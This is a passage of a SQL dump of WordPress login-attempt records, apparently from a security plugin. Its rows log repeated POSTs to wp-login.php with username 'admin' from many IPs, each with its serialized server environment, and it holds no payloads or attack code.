00:00:00'),(95064,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59976\";s:11:\"REMOTE_ADDR\";s:13:\"164.160.91.19\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746781547.9686661;s:12:\"REQUEST_TIME\";i:1746781547;}}','164.160.91.19',0,'2025-05-09 14:35:49','1970-01-01 00:00:00'),(95065,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57932\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.215.190\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746782273.0459261;s:12:\"REQUEST_TIME\";i:1746782273;}}','162.0.215.190',0,'2025-05-09 14:47:54','1970-01-01 00:00:00'),(95066,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58486\";s:11:\"REMOTE_ADDR\";s:12:\"103.132.20.2\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746783004.1242721;s:12:\"REQUEST_TIME\";i:1746783004;}}','103.132.20.2',0,'2025-05-09 15:00:05','1970-01-01 00:00:00'),(95067,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57286\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.120.87\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746783746.1820121;s:12:\"REQUEST_TIME\";i:1746783746;}}','198.54.120.87',0,'2025-05-09 15:12:28','1970-01-01 00:00:00'),(95068,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"99\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54488\";s:11:\"REMOTE_ADDR\";s:12:\"209.172.2.50\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746784485.4537239;s:12:\"REQUEST_TIME\";i:1746784485;}}','209.172.2.50',0,'2025-05-09 15:24:47','1970-01-01 00:00:00'),(95069,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"100\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59246\";s:11:\"REMOTE_ADDR\";s:13:\"8.210.103.127\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746785206.8371949;s:12:\"REQUEST_TIME\";i:1746785206;}}','8.210.103.127',0,'2025-05-09 15:36:48','1970-01-01 00:00:00'),(95070,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35788\";s:11:\"REMOTE_ADDR\";s:14:\"103.118.29.120\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746785919.036118;s:12:\"REQUEST_TIME\";i:1746785919;}}','103.118.29.120',0,'2025-05-09 15:48:40','1970-01-01 00:00:00'),(95071,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ru-RU,ru;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57306\";s:11:\"REMOTE_ADDR\";s:12:\"51.38.119.44\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746786620.342133;s:12:\"REQUEST_TIME\";i:1746786620;}}','51.38.119.44',0,'2025-05-09 16:00:22','1970-01-01 00:00:00'),(95072,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:119:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56384\";s:11:\"REMOTE_ADDR\";s:14:\"198.54.120.130\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746787315.6813729;s:12:\"REQUEST_TIME\";i:1746787315;}}','198.54.120.130',0,'2025-05-09 16:11:57','1970-01-01 00:00:00'),(95073,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ar-SA,ar;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"58730\";s:11:\"REMOTE_ADDR\";s:12:\"162.0.217.89\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746788003.188729;s:12:\"REQUEST_TIME\";i:1746788003;}}','162.0.217.89',0,'2025-05-09 16:23:25','1970-01-01 00:00:00'),(95074,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38048\";s:11:\"REMOTE_ADDR\";s:13:\"81.177.139.64\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"Q